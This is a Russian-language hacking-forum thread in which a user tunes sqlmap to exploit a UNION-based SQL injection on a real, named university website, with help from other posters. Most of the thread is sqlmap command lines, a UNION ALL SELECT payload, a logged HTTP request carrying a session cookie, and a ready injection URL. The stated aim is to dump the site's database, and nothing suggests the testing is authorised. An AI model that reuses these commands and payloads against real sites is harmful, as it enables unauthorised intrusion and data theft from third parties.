Разбирабюсь с sqlmap. Взял первую попавшуюся уязвимую ссылку: http://forum.antichat.ru/threads/424558/page-3#post-3893898 и пытаюсь сканировать. Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть. Вот и не могу написать правильно, что бы нашлась именно union уязвимость. Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ. Code: ./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4
А что, если я скажу что на этом сайте нету бд mysql, возможно ты сделал опечатку и хотел написать вместо -D mysql --dbms=mysql, тогда скорее всего всё заработает
Да, спасибо. Как минимум, тут точно есть ошибка, но все равно это не помогает: Более правильный вариант: Code: ./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 --dbms=mysql -v 4
да, я понимаю, что тут и руками не сложно. Вот именно поэтому и взял простой пример, где понимаю, как все приосходит "руками", что бы разобраться на простом примере в работе sqlmap. Havij под win работает, а я сторонник *NIX систем. Ожидал, что sqlmap с легкостью справится с этой задачей. Да, блайндом можно вытянуть дамп, но это долго. Вот и все еще хочу разобраться в нюансах sqlmap-а. Все же был бы признателен, если кто-то подскажет, как же все таки правильно задать конфигурацию, что бы вытянуть дамп с поиощью sqlmap.
sqlmap отправляет нужный запрос: Code: ./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --threads=5 Code: [10:52:10] [PAYLOAD] 239 UNION ALL SELECT 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500# -- [10:52:10] [TRAFFIC OUT] HTTP request [#5]: GET /index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20-- HTTP/1.1 Accept-Encoding: identity Cookie: fe_typo_user=3b6ec0176deabb1294c4e4b9940c4a45 Host: www.htw-dresden.de Referer: https://www.htw-dresden.de:443/index.php User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 Connection: close но он не определяет его как "положительный". Если просто руками вставить в адресную строку Code: https://www.htw-dresden.de/index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20-- То все как бы отлично. Но sqlmap не хочет говорить о том, что беда имеет место быть.
Добавил --string и вуаля: Code: ./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --string="100500"